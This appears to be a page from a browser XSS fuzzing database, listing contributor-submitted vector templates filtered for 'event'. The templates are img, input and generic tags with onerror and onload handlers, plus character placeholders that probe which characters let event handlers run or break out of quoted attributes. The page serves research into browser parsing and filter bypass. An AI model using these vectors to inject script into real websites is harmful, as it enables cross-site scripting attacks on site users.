Featured vector
Chrome 0.0
<!-- sample vector --> <img src=xx:xx 0x0aonerror=alert(1)>
<!-- sample vector --> <img src=xx:xx 0x0aonerror=alert(1)>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml
3,424,392 Successful fuzzes
Fuzz Vectors
Searching for "event"
Your browser identified asGeneral Crawlers unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| Characters between event handlers | <img id="fuzz*num*" src=x onerro*chr*r='xx'> | @salchoman |
| char after event | <!-- sample vector --> <img src=xx:xx onerror*chr*=logChr(*num*)> | @chmodxxx |
| On Event Header Based Testing | <img src=x *chr*onError="javascript:log(*num*)"/> | @1baicai1 |
| Valid characters in on____ event handler attributes | <img src on*chr*error=logChr(*num*)> | @Lamp_Sec |
| Characters used for event handlers instead of equal sign | <img src*chr*"about:blank"> | @synackozgur |
| Crazy MSIE v3 | <input value=""*dataevents* =customLog('*dataevents*') " type="text"> | @Giutro |
| o replacement in event handlers | <img src=xx:xx *chr*nerror=logChr(*num*)> | @blubbfiction |
| Characters allowed between event handlers and equal sign | <img src="about:blank" onerror*chr*=logChr(*num*)> | @peksa |
| HTML input image tag attributes that run JavaScript | <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> | @peksa |
| HTML input tag attributes that run JavaScript | <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> | @peksa |
| Characters that dont inhibit eventhandlers | <img src=xx:xx o*chr*nerror=logChr(*num*)> | @tifkin_ |
| Characters that break out of quoted attributes2 | <img src="1*chr* onerror="logChr(*num*)"> | @tifkin_ |
| Characters allowed between 2 consecutive functions | <script> function a() {} </script> <img src=1 onerror="a()*chr*logChr(*num*)"> | @tifkin_ |
| Characters allowed before single functions in event handlers | <img src=1 onerror="*chr*logChr(*num*)"> | @tifkin_ |
| Characters that can set event handlers3 | <img src=1 onerror*chr*"logChr(*num*)"> | @tifkin_ |
| Tags that have the onload event | <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> | @garethheyes |
| char for fireing onload event | <img src=*chr* onload=logChr(*num*)> | @heyheyheyhey10 |
| html dataentities before event handler | <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> | @testacc40590139 |
| Characters that trigger a new attr after new line | <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters ignored in html event handler name | <img src=x on*chr*Error="javascript:log(*num*)"/> | @mhswende |
| Tags and events that execute javascript 2 | <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
| Tags and events that execute javascript | <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> | @garethheyes |
| Tags that execute onerror | <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> | @garethheyes |